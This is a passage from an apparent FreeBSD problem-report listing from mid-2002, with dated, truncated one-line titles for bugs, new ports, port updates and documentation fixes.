sysinstall during setup cau o [2002/06/03] ports/38855 ports net/gtk+licq does not work o [2002/06/03] misc/38857 obrien "file" command hangs when using "-z" opti o [2002/06/03] ports/38861 nik www/auth_ldap compiles-installs but fails o [2002/06/03] i386/38863 Burning CDs crashes since 4.6stable o [2002/06/03] misc/38870 kernel-panic when coping data from a NFS- o [2002/06/03] ports/38876 tegge devel/linuxthreads: pkg-plist ignores NOP f [2002/06/04] kern/38886 Maxtor 3000LE requires another sys/cam/sc o [2002/06/04] ports/38899 ports New port: Yahoo transport for the Jabber o [2002/06/05] ports/38914 ports New Port: zed o [2002/06/05] ports/38915 ports New port: "MOVA" - Scripts for Work with o [2002/06/05] ports/38917 nik Update port: print/jadetex (create jadete o [2002/06/05] i386/38919 imp A Belkin 802.11 PCMCIA card is not recogn o [2002/06/05] kern/38923 Incorrect device use count prevents door o [2002/06/05] docs/38924 gshapiro Mailwrapper(8) or mailer.conf(5) should m o [2002/06/05] bin/38931 Cleanup for WARNS=4 of src/games/fortune/ o [2002/06/05] misc/38937 delay between tracks in digital audio dum o [2002/06/05] ports/38938 ports New port: gnome/bubblemon - A CPU and mem o [2002/06/05] bin/38940 Change: an option to *stat to allow supre o [2002/06/06] ports/38950 ports perforce Makefile doesn't do PORTREVISION o [2002/06/06] ports/38958 ports New port: MySQLMan - a web based MySQL da o [2002/06/06] ports/38961 znerd mod_jk, dependencies outdated o [2002/06/06] misc/38965 kde [PATCH] kapptemplate fails on FreeBSD f [2002/06/06] ports/38966 kde [PATCH] AUTO_SUBDIRS used instead of AUTO o [2002/06/06] kern/38967 4/22/02 pcm driver merge appears to break o [2002/06/07] docs/38982 doc developers-hanbook/Jail fix o [2002/06/07] kern/38986 a change to msdosfs permissions behaviour o [2002/06/07] ports/38989 assar Fix to BROKEN arla port (arla-0.35.6) o [2002/06/07] ports/39005 sobomax freetype2 port fetches an HTML page, not o [2002/06/07] ports/39007 ports ringtonetools for the ports f [2002/06/08] i386/39023 Keystrokes yield extended ASCII o [2002/06/08] ports/39030 ports New port: www/p5-Apache-Gallery - mod_per f [2002/06/08] kern/39031 bugreport: kernel o [2002/06/08] docs/39038 doc Reference in a non existent man page. o [2002/06/08] docs/39044 doc The man page for rot13(6) never mentions o [2002/06/08] kern/39047 IPSEC Compression (IPCOMP) broken in tunn o [2002/06/08] ports/39054 portmgr Support USE_OPENSSL=yes in bsd.port.mk o [2002/06/09] ports/39059 ports New port: IMCom command-line Jabber clien o [2002/06/09] ports/39062 ports beep: beep for a pitch and duration o [2002/06/09] www/39068 www Hypertext man pages use strange hyphen at o [2002/06/09] ports/39080 sobomax java/javavmwrapper: Functionality enhance o [2002/06/09] docs/39084 doc Various tweaks to doc/en_US.ISO8859-1/boo o [2002/06/09] ports/39086 ports Update kappdock to 0.46-1 so as to run un o [2002/06/10] ports/39094 portmgr request for new category: parallel o [2002/06/10] ports/39095 mharo ports/net/nttcp and ports/net/ttcp appear o [2002/06/10] docs/39101 doc Misplaced parenthesis in the FAQ? o [2002/06/10] ports/39102 portmgr new category requested: finance o [2002/06/10] ports/39103 portmgr new virtual category requested: accessib o [2002/06/10] ports/39114 ports Checksum mismatch in flvw port p [2002/06/10] bin/39116 tjr /usr/bin/printf o [2002/06/10] ports/39124 ports upgrade ports/russian/fortunerus p [2002/06/10] conf/39125 dougb [PATCH] /etc/usbd.conf should enable curs o [2002/06/10] docs/39129 doc handbook; type WRT simulating postscript o [2002/06/10] ports/39131 ports litestream port obsolete o [2002/06/10] ports/39136 sobomax Enable arts in SDL o [2002/06/10] ports/39137 lioux update port: qmail-tls o [2002/06/11] ports/39140 ports New Port: Acrobat Reader 5 CJK font packs o [2002/06/11] ports/39144 ports Port Upgrade (parmetis) o [2002/06/11] docs/39164 doc Misprint in units(1).lib (aganist) o [2002/06/11] ports/39166 ports new port: www/p5-Apache-AntiSpam o [2002/06/11] ports/39174 ports Need port of SBCL (Steel Bank Common Lisp o [2002/06/11] ports/39178 ports new port: games/crack-attack (An OpenGL g o [2002/06/11] ports/39182 ports netsaint-plugins util.c functions don't q o [2002/06/12] ports/39189 ports lang/clisp needs gcc295 (coredumps with 3 o [2002/06/12] docs/39190 blackend Missing quote tags in releng-packages art o [2002/06/12] conf/39192 [PATCH] Save pcm mixer settings during re a [2002/06/12] ports/39193 ports [maintainer-update] net/papaya update to o [2002/06/12] ports/39197 sobomax /usr/ports/archivers/ucl is outdated o [2002/06/12] bin/39198 sh aborts on variables with periods o [2002/06/12] misc/39201 ptrace(2) and rfork(RFLINUXTHPN) confuse o [2002/06/12] ports/39204 ports New port: deskutils/mnemo, a web-based no o [2002/06/12] bin/39206 core dump bug in sshd o [2002/06/12] ports/39207 ports [NEW PORT] x11-toolkits/gtk20-apireferenc o [2002/06/12] docs/39213 doc No rc(4) man page o [2002/06/12] docs/39214 doc No my(4) man page o [2002/06/13] ports/39219 ports ddd port not builds on -CURRENT o [2002/06/13] ports/39228 ports native port of vsound 0.5 o [2002/06/13] misc/39229 instruction pointer = 0x8:0xc00eaf13 o [2002/06/13] ports/39250 ports New port: lang/cmucl-extra o [2002/06/13] ports/39251 chuckr Update octave port o [2002/06/13] standards/39256standards[v]snprintf aren't POSIX-conformant for s o [2002/06/13] docs/39257 doc printf manpage doesn't document error ret o [2002/06/13] ports/39258 anders mail/cclient doesn't build on freebsd/spa o [2002/06/14] docs/39293 doc the dumpon man page incorrectly states th o [2002/06/14] ports/39304 ports Maintainer Update: textproc/jdictionary ( o [2002/06/14] conf/39306 The /etc/rc file should know if is runnin o [2002/06/14] ports/39307 ports New port: ASpath-tree a IPv6 route stabil o [2002/06/14] ports/39308 portmgr New port: hu-ispell 0.85 (Hungarian spell o [2002/06/14] bin/39311 qa you can't enable inetd in sysinstall with o [2002/06/14] ports/39312 ports [PATCH] Addition of mysql-awareness to mo o [2002/06/14] ports/39317 hoek uulib port fails to build due to sed(1) r o [2002/06/15] misc/39326 execve() for ELF exe drops VTEXT when re- o [2002/06/15] ports/39342 sobomax Add automatic truetype support to Mozilla o [2002/06/15] misc/39347 use of /usr/bin/* utils in /etc/rc.diskle o [2002/06/15] docs/39348 doc kenv fetch of hostname requires dhcp/boot o [2002/06/15] misc/39353 /usr/share/examples/diskless clone root c o [2002/06/15] ports/39357 ports Maintainer update: biology/ncbi-toolkit o [2002/06/16] misc/39360 If linux emu is added as a dependency (an o [2002/06/16] ports/39364 ports new port: cad/gwave o [2002/06/16] ports/39370 ports Update port: japanese/dvipsk-vflib o [2002/06/16] ports/39371 ports o [2002/06/16] ports/39375 ports astro/seti_applet depends on libgtop whic o [2002/06/16] ports/39383 ports update for comms/qpage port o [2002/06/16] ports/39390 gnome Make graphics/imlib not depend upon GTK+ f [2002/06/16] misc/39394 4.6 does not run as VMware guest OS o [2002/06/17] ports/39406 perky Update port: devel/sip o [2002/06/17] ports/39407 perky Update port: x11-toolkits/py-qt o [2002/06/17] ports/39413 ports [maintainer-update] net/gnugadu o [2002/06/17] ia64/39415 ia64 Bootloader assuming 8KB buffer when only o [2002/06/17] ports/39416 ports New port: t2ps o [2002/06/17] ports/39417 gnome gtk-config and glib-config filename conve o [2002/06/17] ports/39421 ports New Port: smapi2-library for various FTN- o [2002/06/17] kern/39423 silby vr0 watchdog timeout o [2002/06/17] misc/39425 Auto mounted directory was not found at b o [2002/06/17] misc/39439 tcopy will not duplicate tapes with block f [2002/06/17] ports/39440 dima Make pilot-link compile with GCC3 on -CUR o [2002/06/17] ports/39454 portmgr net/kmsn needs to be replaced by kmerlin o [2002/06/18] bin/39463 [PATCH] Add several options to fingerd o [2002/06/18] misc/39466 find -xdev hangs on dead NFS mounts (/etc o [2002/06/18] ports/39469 ports new FreeBSD port mail/avcheck o [2002/06/18] ports/39470 ports Update port: devel/sdts++ o [2002/06/18] ports/39476 ports profxp will run but when you fxp a file i o [2002/06/18] ports/39487 mharo portlint doesn't accept MASTER_SITE/DISTF o [2002/06/18] ports/39492 portmgr devel/autoconf picks up non-standard shel o [2002/06/19] ports/39504 gnome textproc/libxml2 & invalid XML catalogs i o [2002/06/19] conf/39505 automate BUILDNAME variable for releases o [2002/06/19] kern/39527 dwmalone getcwd() and unreadable parent directory o [2002/06/19] docs/39530 doc access(2) man page has unnecessarily broa o [2002/06/19] docs/39532 doc 'find' man page should o [2002/06/19] conf/39537 imp External ThinkPad 240 cdrom does not work o [2002/06/19] ports/39544 ports mayavi port disfunctional o [2002/06/19] ports/39550 ports the port doesn't install all the files li o [2002/06/20] i386/39574 qa Error mounting /dev/acd0c on /dist: No su o [2002/06/20] bin/39576 [PATCH] tail -f for multiple files p [2002/06/20] bin/39578 add more russian holydays o [2002/06/20] conf/39580 insecure default settings o [2002/06/20] i386/39584 ln -f fails to unlink o [2002/06/20] ports/39597 ports New port: jdictionary-eng-hun 1.4 - Hunga o [2002/06/20] ports/39598 ports New port: jdictionary-eng-hun-expr 1.4 - o [2002/06/20] ports/39600 znerd New port: jdictionary-ger-hun 1.4 - Germa o [2002/06/20] ports/39601 ports New port: JDictionary plugin: French-Hung o [2002/06/20] ports/39602 ports New port: JDictionary plugin: Interlingua o [2002/06/20] ports/39603 znerd New port: jdictionary-eng-ger 1.4 - Engli o [2002/06/20] ports/39606 ports Updated port: audio/lame (3.92) o [2002/06/20] ports/39608 ports upgrade games/cgoban to 1.9.13 o [2002/06/20] ports/39610 ports update www/p5-Apache-DBI to 0.89 o [2002/06/21] misc/39619 flashplugin-mozilla crashes and doesnt pl o [2002/06/21] ports/39620 ports flashplugin-mozilla crashes when viewing o [2002/06/21] ports/39621 ports isc-dhcpd server can't get all network in o [2002/06/21] ports/39627 chein new camserv won't compile, use old for no o [2002/06/21] misc/39628 schweikh Please add new terminal definition to /us o [2002/06/21] ports/39631 ports port eyeclock unaligned access on alpha o [2002/06/21] ports/39634 jim Port pclock unaligned access on alpha o [2002/06/22] kern/39650 Digital audio extraction on an atapi CD d f [2002/06/22] ports/39666 ports New Port: gwenview (Graphicbrowser for KD o [2002/06/22] ports/39673 ports netsaint-plugins fails to install command o [2002/06/22] bin/39676 lukemftpd manual pages fix + examples o [2002/06/22] kern/39681 hidden kernel boot tunables added to sysc o [2002/06/22] ports/39686 mbr [PATCH] www/mod_frontpage: Detect Documen o [2002/06/23] ports/39690 ports Update - New Port: gwenview (Graphicbrows o [2002/06/23] ports/39697 ports New port: arson - CD burning and ripping o [2002/06/23] ports/39705 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39707 ports New Port: scmxx 0.6.1.3 (Data Exchange ut o [2002/06/23] ports/39723 ports New port: hu-phone - Hungarian phone code o [2002/06/23] ports/39728 ports New port: hu-zipcodes - Hungarian post co o [2002/06/23] ports/39744 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39745 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] docs/39748 doc [PATCH] Some changes to aio_*(2) o [2002/06/23] docs/39751 doc handbook/ports-using.html sysinstall clar o [2002/06/23] ports/39755 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] misc/39772 imp pccardd is slow to install a PCCARD. o [2002/06/24] ports/39777 des New port: security/libsectok o [2002/06/24] ports/39778 des New port: security/sectok o [2002/06/24] misc/39787 T/TCP support o [2002/06/24] ports/39791 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39792 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39794 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39799 dirk mod_php4, among other ports, maintains no o [2002/06/24] ports/39801 ports New port: kpovmodeler - a KDE frontend fo o [2002/06/24] ports/39806 ports New port: knights - a KDE frontend for cr o [2002/06/24] bin/39818 cleaning sbin/atm code from warnings o [2002/06/24] bin/39819 tjr cleaning bin/sh code from warnings o [2002/06/24] docs/39822 doc firewall.7: change "Mbits" to "Mbits/s" a o [2002/06/24] docs/39824 doc Various tweaks for doc/en_US.ISO8859-1/bo o [2002/06/25] ports/39847 ports New port: dump9660 o [2002/06/25] docs/39852 doc Handbook: treatment of KERNCONF is incons o [2002/06/25] ports/39854 ports New port: kdirstat - A small KDE utility o [2002/06/25] misc/39864 robert hostname instead of IP in w -n output o [2002/06/25] bin/39865 cleaning sbin/fsck code from some warning o [2002/06/25] bin/39866 cleaning sbin/fsdb code from warnings o [2002/06/25] bin/39867 cleaning sbin/mount_cd9660 and sbin/mount o [2002/06/25] bin/39868 cleaning sbin/dump code from warnings o [2002/06/25] ports/39871 adrian [new port] sysutils/lire o [2002/06/26] ports/39882 ports pptp client does not install from port in o [2002/06/26] ports/39888 ports New Port: ports/math/maxima o [2002/06/26] bin/39893 setusercontext library call differs umask o [2002/06/26] ports/39895 ports New Port: ports/lang/screamer o [2002/06/26] ports/39900 ports New port: fmirror o [2002/06/26] ports/39901 ports Convert java/jsdk to use bsd.java.mk o [2002/06/26] ports/39902 ports Convert www/apache-jserv to use bsd.java. o [2002/06/26] bin/39904 cleaning sbin/sysctl code from warnings o [2002/06/26] bin/39905 cleaning sbin/restore code from warnings o [2002/06/26] bin/39907 cleaning sbin/savecore code from warnings o [2002/06/26] misc/39911 New Netgear MA401 pccard does not work wi o [2002/06/26] ports/39912 ports new port of ITS RP06 filesystem image for o [2002/06/27] ports/39917 ports Update Port: x11/wmmenu 0.9 -> 1.2 o [2002/06/27] ports/39926 ports [NEW-PORT] EKG - client for Polish instat o [2002/06/28] ports/39946 ports Shift-Tab navigation doesn't work in tk-8 o [2002/06/28] misc/39951 Sendmail 8.12.3 and `msgs' alias o [2002/06/28] ports/39955 ports new port of KLH10 PDP-10 mainframe emulat o [2002/06/28] ports/39957 ports New port: databases/jdb o [2002/06/28] ports/39962 ports ports/astro ${PERL} -> ${REINPLACE_CMD} o [2002/06/28] ports/39963 ports New port: Tool to convert Outlook .pst to o [2002/06/28] ports/39964 ports ports/audio misc Makefile cleanup o [2002/06/28] ports/39965 portmgr ports/Mk/bsd.port.mk add several tools o [2002/06/28] ports/39968 ports ports/cad misc Makefile cleanup o [2002/06/28] ports/39969 ports ports/benchmarks misc Makefile cleanup o [2002/06/28] ports/39971 ports ports/comms minor Makefile cleanup o [2002/06/28] ports/39972 ports ports/databases misc Makefile cleanup o [2002/06/28] ports/39973 ports ports/deskutils misc Makefile cleanup o [2002/06/28] conf/39976 vi recovery halting boot process o [2002/06/28] kern/39977 Device polling support for em(4) driver o [2002/06/28] ports/39978 ports ports/devel misc Makefile cleanup o [2002/06/29] ports/39998 ports Makefile for netpbm port has several flaw o [2002/06/29] ports/40000 ports New port: a java-like thread library for o [2002/06/29] ports/40002 wjv py-4suite: XSLT import error o [2002/06/29] ports/40004 trevor ports/audio/festlex-ogi has a checksum er o [2002/06/29] kern/40017 [patch] allows config(8) to specify confi o [2002/06/29] kern/40021 [patch] use ld(1) to build kernel with li o [2002/06/30] misc/40038 src/share/man/man4/ifmib.4 : syntax error o [2002/06/30] bin/40047 "make release" fails in games/adventure ( o [2002/06/30] misc/40057 bugbusterssend-pr -a flag does not work with -f o [2002/06/30] kern/40058 lockup on 5.0 DP1 - Xircom X3201 (RealPor o [2002/07/01] ports/40069 dirk mod_php4 doesn't compile with apache2 (& o [2002/07/01] ports/40072 ports port upgrade/new port graphics/sinek: a l o [2002/07/01] ports/40074 dwcjr configurationprogram for samba does not w o [2002/07/01] misc/40081 noise in sound output with built-in CMedi o [2002/07/01] ports/40087 portmgr Specifying USE_GCC to "make clean" hangs o [2002/07/01] ports/40098 ports New port: x11-toolkits/lablgtk: An ocaml o [2002/07/01] ports/40105 ports New port: Qinx theme/style for KDE o [2002/07/02] ports/40107 trevor ports/audio/festogi-spanish has a checksu o [2002/07/02] ports/40110 dirk add mnoGoSearch extensions to www/mod_php o [2002/07/02] ports/40116 ports New port: graphics/gtkam (fix ports/39159 o [2002/07/02] conf/40120 gshapiro Existing rc.sendmail in -STABLE doesn't a o [2002/07/02] ports/40121 ache standard Apache port creates sbin link o [2002/07/02] ports/40124 ports Patch to wdm to allow long passwords o [2002/07/02] bin/40127 [PATCH] Add functions for PID-file handli o [2002/07/02] ports/40128 ports [new port] games/groundhog o [2002/07/02] ports/40131 ports tclock fails to compile o [2002/07/02] ports/40137 ports New port: net/6to4 - enables 6to4 tunnels o [2002/07/03] ports/40140 trevor ports/audio/festvox-abc has a checksum er o [2002/07/03] kern/40155 No sound on Presario 700 laptop's ac97 co o [2002/07/03] ports/40163 cy screen w/o suid and locale o [2002/07/03] misc/40169 problem in latest 4.6-stable o [2002/07/03] ports/40171 obrien vim 6.1.118 cannot build o [2002/07/04] ports/40174 mi wordnet - wnb failes to run o [2002/07/04] ports/40179 ports port update: net/flow-tools 0.57 -> 0.58 o [2002/07/04] ports/40183 sobomax Updated Port audio/extace 1.4.5 -> 1.7.3 o [2002/07/04] docs/40196 doc man find does not describe -follow o [2002/07/04] misc/40197 sos BurnCD doesn't "just work" at 4.6-p1 o [2002/07/04] misc/40211 No sound on Compaq Presario 700 f [2002/07/05] ports/40226 ports New port: ldapdns - A dns server that ser o [2002/07/05] ports/40230 taoka ports/audio/mpg123.el has a checksum erro o [2002/07/05] docs/40234 doc Typos and language cleanup in /usr/share/ o [2002/07/05] ports/40235 ports New port: graphics/kbarcode - barcode gen o [2002/07/05] docs/40237 doc Typos in loader.conf.5 o [2002/07/05] ports/40238 ports New port: devel/antlr o [2002/07/05] ports/40239 ports New port: lang/gh (The Generic Haskell co o [2002/07/05] ports/40241 trevor Update port: biology/xdrawchem to 1.4 (fi o [2002/07/06] ports/40263 sobomax ports/x11-toolkits/easygtk file don't exi o [2002/07/06] ports/40271 anholt System CFLAGS not included everywhere in f [2002/07/06] misc/40273 dougb some more fortunes o [2002/07/06] ports/40276 ports slurp port overwrites/delete existing con o [2002/07/06] misc/40280 I add uscanner entory o [2002/07/07] ports/40284 ports ports/x11/djvuplugin tarball no longer ex o [2002/07/07] ports/40294 ports New port: emulators/gpsim o [2002/07/07] misc/40297 Seagate STT8000A (ast0) atapi tape drive o [2002/07/07] misc/40298 using swapfile as /tmp o [2002/07/07] conf/40302 imp New addition to /etc/defaults/pccard.conf o [2002/07/07] ports/40306 ports /usr/ports/games/an won't build o [2002/07/07] ports/40308 ports Can't build fileutils port on -STABLE o [2002/07/07] docs/40311 doc Typos and language adjustments to ipfw.8 o [2002/07/07] docs/40313 doc Grammar, wording, and clarifications for o [2002/07/07] ports/40324 markm security/pgp5 aborts on Pentium4 systems o [2002/07/08] misc/40325 UID changes not reflected in viewed file/ f [2002/07/08] ports/40326 ports ports/cad/leocad has a checksum error o [2002/07/08] ports/40344 ports update of mail/ssmtp to 2.50.9 o [2002/07/08] ports/40347 obrien editors/vim-lite is linked with libiconv o [2002/07/08] kern/40350 "apm: 16-bit connection error." message w o [2002/07/08] ports/40361 ports lang/cmucl dumps core o [2002/07/08] ports/40366 ports New port: graphics/openrm OpenGL based li o [2002/07/08] ports/40368 ports New port: games/gturing - A simple Turing o [2002/07/08] kern/40369 rman_reserve_resource - when "count > (en o [2002/07/09] ports/40372 ports ports/www/chtml mastersite has changed o [2002/07/09] ports/40374 ports databases/sqsh is built without readline o [2002/07/09] misc/40378 stdlib.h gives needless warnings with -an o [2002/07/09] ports/40384 kde prob with libXext when compiling KDE3 o [2002/07/09] ports/40389 ports New port: linux_dri-devel (CVS linux DRI o [2002/07/09] conf/40391 sysinstall with PCCARD<->ISA bridge gets o [2002/07/09] ports/40393 anders Update to databases/mdbtools o [2002/07/09] ports/40396 ports New port: Logging daemon for Linksys BEFS o [2002/07/09] ports/40398 ports new port: gcc31bc o [2002/07/09] ports/40400 ports Update port: misc/gtktalog - A tool to ma o [2002/07/10] ports/40411 ports apache-jserv port points to wrong locatio o [2002/07/10] ports/40415 kde Upgrade of net/kio_fish to 1.1.2 o [2002/07/10] ports/40417 ports port for bozohttpd o [2002/07/10] ports/40421 ports o [2002/07/10] docs/40423 doc Keyboard(4)'s definition of parameters to o [2002/07/10] docs/40443 doc Update books/faq/book.sgml for USB .ko's o [2002/07/10] ports/40444 ports graphics/libfpx won't build (on Alpha ??) o [2002/07/10] ports/40445 kris Update Port: security/rats to rats-1.5 o [2002/07/11] ports/40450 dinoex lang/pike fails to build on -current, due o [2002/07/11] ports/40452 wollman ports/www/mod_auth_kerb mastersite doesn' o [2002/07/11] ports/40460 sobomax Update port: ftp/ftpcopy 0.4.8 -> 0.4.10 o [2002/07/11] ports/40461 ports New port MP3c , a cd to mp3 converter wit o [2002/07/11] docs/40465 trhodes ata(4) samples moved to atacontrol(4). o [2002/07/11] ports/40469 ports New port: gnome/bubblemon - A CPU and mem o [2002/07/11] ports/40470 znerd ports tomcat3.3.1 not boot-autostart o [2002/07/11] ports/40472 ports request for new port o [2002/07/12] ports/40473 dinoex lang/pike looks for master.pike in the wr o [2002/07/12] ports/40474 ports Cannot make /usr/ports/graphics/gd2 o [2002/07/12] ports/40475 jkoshy ports/www/p5-HTML-Webmake has a checksum o [2002/07/12] kern/40486 [PATCH] kevent/kqueue does not work with p [2002/07/12] docs/40489 keramida ^Z in systat manpage o [2002/07/12] ports/40511 ports update for net/zebra (no-ipv6 option) f [2002/07/12] i386/40512 release i386 4.5 packages gnome/gnomeprin o [2002/07/12] ports/40514 ports New port: graphics/linux-ac3d easy to use o [2002/07/12] kern/40516 ti driver has no buadrate set o [2002/07/13] ports/40521 ports New ports math/blacs and math/scalapack: o [2002/07/13] ports/40525 ports [new port] mail/mew2-xemacs-devel-mule o [2002/07/13] ports/40528 kris Update port: security/snort o [2002/07/13] ports/40535 grog Updated Port benchmarks/rawio 1.1 -> 1.2 o [2002/07/13] conf/40537 imp add ata card entry to pccard.conf f [2002/07/13] bin/40538 dougb mergemaster fixes and enhancements o [2002/07/13] bin/40540 gshapiro allow multiple alias file to be defined i o [2002/07/13] ports/40541 ports New port: japanese/t2ps o [2002/07/13] kern/40543 /usr/src/sys/sys/proc.h:117: field `ar_ar o [2002/07/13] ports/40544 ports New port: postnuke o [2002/07/14] ports/40546 ports ports/www/php-screw has a checksum error o [2002/07/14] conf/40548 list of /etc/defaults/make.conf undocumme o [2002/07/14] misc/40552 alternate syscons font for iso-07 encodin o [2002/07/14] ports/40555 steve x11-toolkits/open-motif requires mkhtmlin o [2002/07/14] ports/40556 steve x11-toolkits/open-motif requires mkhtmlin o [2002/07/14] kern/40563 gif driver can clobber route/arp table o [2002/07/14] bin/40570 dhclient freeze the whole thing o [2002/07/14] ports/40571 portmgr Removes ancient USE_NEWGCC from ports o [2002/07/14] bin/40572 vipw prints silly message if $EDITOR fail o [2002/07/14] misc/40577 post-October 2001 Dell Inspiron 2500's (a o [2002/07/15] ports/40593 ports www/oops FreeBSD port does not obey BATCH o [2002/07/15] bin/40597 add /sbin/fdisk ability of showing extend o [2002/07/15] ports/40602 ports new port: security/clamav o [2002/07/15] ports/40607 ports New Port: rexima o [2002/07/15] ports/40608 kde Fix port: devel/kdesdk3 o [2002/07/15] kern/40611 [PATCH] linux JRE 1.4 under linux compati o [2002/07/15] bin/40617 brian /usr/sbin/ppp is not able to bind the nat f [2002/07/15] misc/40632 psm0 busy: o [2002/07/15] ports/40638 ports spamass-milter port hangs on multiple sim o [2002/07/16] ports/40642 ports ports/cad/slffea has a checksum error o [2002/07/16] ports/40644 ports New port: lang/bigloo - A Scheme interpre o [2002/07/16] ports/40645 kde kdeinit coredumps on KDE logout (11 signa o [2002/07/16] misc/40657 Logitech iFeel usb mouse will not attach o [2002/07/16] ports/40659 dirk php3 and GD problem o [2002/07/16] ports/40660 ports New Port: security/geheimnis-devel PGP/Gn o [2002/07/16] ports/40668 sobomax Update port: ftp/ftpcopy -> 0.5.0 p [2002/07/16] standards/40669standardscommand command does not support `-p' opt o [2002/07/16] misc/40671 pthread_cancel doesn't remove thread from o [2002/07/16] ports/40676 ports Fatal error building /usr/ports/security/ o [2002/07/17] ports/40679 ports New port: devel/ruby-yaml - A YAML serial o [2002/07/17] ports/40689 keith ports/chinese/dia file not found on maste o [2002/07/17] ports/40691 ports netscape 7 directory user default f [2002/07/17] misc/40693 the system reboot alone with no reason o [2002/07/17] ports/40699 portmgr allow exclude patterns in `make search` o [2002/07/17] ports/40700 ports New Port: security/libgcrypt General purp o [2002/07/17] www/40704 www Incorrect CGI settings in http://www.fi.F o [2002/07/17] ports/40705 ports Upgrade of gnome-commander to 0.9.8 o [2002/07/17] kern/40711 CT5880-C sometimes fails to output sound o [2002/07/17] docs/40712 doc Release docs (under release/4.6R) and up o [2002/07/17] bin/40717 No ftpchroot.5 -> ftpusers.5 link o [2002/07/18] ports/40726 ports [Fix] security/gpgme pkg-plist info files o [2002/07/18] ports/40727 ports New Port: security/libksba The X.509 Libr o [2002/07/18] ports/40734 ports Update port: audio/streamtuner o [2002/07/18] ports/40735 ports New port: streamtuner-local, a local MP3 o [2002/07/18] ports/40736 ports New port: streamtuner-live365, a Live365 o [2002/07/18] docs/40739 doc handbook/mirrors/chapter.sgml FTP Mirrors o [2002/07/18] ports/40742 kuriyama DSSSL Modular stylesheets not added to sg o [2002/07/18] kern/40745 Inconsistency between net/if.c and struct o [2002/07/18] ports/40756 ports insecure default options o [2002/07/19] ports/40760 ports New port: mail/kavmilter o [2002/07/19] ports/40761 ports New port: graphics/ncarg o [2002/07/19] kern/40763 [UPDATED PATCH] Introduction of non-stric o [2002/07/19] ports/40768 ports New port: korean/netdic o [2002/07/19] bin/40771 dwmalone inetd.c 1.105 breaks inetd.conf parsing o o [2002/07/19] ports/40772 brian Update port: net/freeradius o [2002/07/19] conf/40777 disktab does not support 2.88MB floppies f [2002/07/19] i386/40781 Xwindow server setup problem o [2002/07/19] ports/40782 ports New port: www/tidy-devel (latest version o [2002/07/19] ports/40784 ports ${PERL}->${REINPLACE_CMD} for unmaintaine o [2002/07/19] ports/40788 ports ports/net/ymessenger upgrade to 0.99.19- o [2002/07/19] ports/40789 ports New port: graphics/gocr OCR (Optical Char o [2002/07/19] ports/40791 ports find->${FIND},xargs->${XARGS} for unmaint o [2002/07/19] ports/40793 ports unbreak benchmarks/bonnie++ for -CURRENT o [2002/07/19] ports/40800 deischen Nedit 5.3 portupgrade fails on -stable sy o [2002/07/20] ports/40808 ports ports/chinese/metalist tarball not found o [2002/07/20] ports/40821 mharo Update www/analog: update to 5.24 o [2002/07/21] ports/40828 ports [MAINTAINER UPDATE] Fix devel/hat for ben o [2002/07/21] ports/40834 ports New port: net/linux-jigdo o [2002/07/21] bin/40846 deprecated test(1) options in src/include o [2002/07/21] ports/40847 ports New Ports: x11/ksimus: Simulation of tech o [2002/07/21] ports/40848 ports reflect WITHOUT-X11 in package name for x o [2002/07/21] docs/40851 doc [PATCH] "mergemaster -p" in UPDATING's "C o [2002/07/21] conf/40855 psuedo-device bpf need note in LINT and G o [2002/07/21] ports/40860 lioux new port: graphics/mplayer-devel f [2002/07/21] i386/40863 4.6 release||Can't seem to get the XFree8 o [2002/07/21] ports/40865 ports Port of net/dhid is old. This PR updates o [2002/07/21] ports/40866 ports sml-nj port CM autoloading compilation pr o [2002/07/21] ports/40870 ports New port: graphics/animabob Interactive 3 o [2002/07/21] docs/40872 doc [PATCH] document potential WEP text key i o [2002/07/22] ports/40877 ports NEW xntp3 port! o [2002/07/22] ports/40881 lioux Update bsd.sites.mk o [2002/07/22] ports/40892 ports New Port: lang/g95 o [2002/07/22] bin/40894 OpenSSH weird delays o [2002/07/22] ports/40897 ports Update port: graphics/ImageMagick o [2002/07/22] ports/40901 ports New Port: lang/gauche - An RSR5 Scheme de o [2002/07/22] ports/40904 ports new port: www/tclcurl o [2002/07/22] docs/40907 doc [PATCH] Typos in /usr/share/man/man7/tuni o [2002/07/22] docs/40909 doc [PATCH] Typos in /usr/share/man/man4/ukbd o [2002/07/22] docs/40910 doc [PATCH] Typos & grammer fixes for /usr/sh o [2002/07/22] docs/40911 doc [PATCH] Minor improvements for /usr/share o [2002/07/22] ports/40912 ports New port: Xtend X10 controller program o [2002/07/22] ports/40913 ports fix port: cad/pcb o [2002/07/22] ports/40914 ports New port: games/linux-nwserver Neverwinte o [2002/07/22] ports/40915 billf Fix pkg-plist for net/ethereal o [2002/07/23] kern/40919 usage of ucred->cr_uid in sys/netinet/in_ o [2002/07/23] ports/40925 ports [new port] www/ljdeps - metaport for Live o [2002/07/23] kern/40926 After Upgrading or Clean Installing 4.6, o [2002/07/23] kern/40927 sound dies with pcm:play:0 play interrupt o [2002/07/23] ports/40932 ports New Port: sysutils/uptimed o [2002/07/23] kern/40933 make depend fails when building kernel fr o [2002/07/23] ports/40935 ports New port: shells/scponly-2.3 (a tiny shel o [2002/07/23] ports/40942 ports New port: graphics/xrml Extensible scene o [2002/07/23] ports/40943 kris [PATCH] security/snortsnarf: Update to 02 o [2002/07/24] i386/40946 Possible way to cause a system to hang us o [2002/07/24] kern/40948 USB HP CDW8200 does not work o [2002/07/24] docs/40951 doc Various fixes for the solid-state article o [2002/07/24] docs/40952 doc login.conf should mention that "idletime" o [2002/07/24] ports/40954 ports New port: ftp/jigdo f [2002/07/24] ports/40956 tobez New port: net/p5-Net-Whois-RIPE o [2002/07/24] i386/40957 rarpd on laptops doesn't find interfaces, o [2002/07/24] bin/40958 apm on Acer TravelMate 351 could not resu o [2002/07/24] bin/40960 cjc periodic security leaves tmp files behind o [2002/07/24] ports/40961 ports Update: mail/fetchmail (5.9.13) o [2002/07/24] ports/40962 portmgr bento - extra files layout change o [2002/07/24] ports/40966 ports Update: net/ddup (3.0.1) o [2002/07/25] docs/40969 doc intro(2) manpage still refers to PID 0 as o [2002/07/25] ports/40970 ports New port: misc/rpl o [2002/07/25] ports/40975 ports Uncatched coredump of pkg_info while pkgd o [2002/07/25] bin/40980 du(1)'s -h and -k options interact confus o 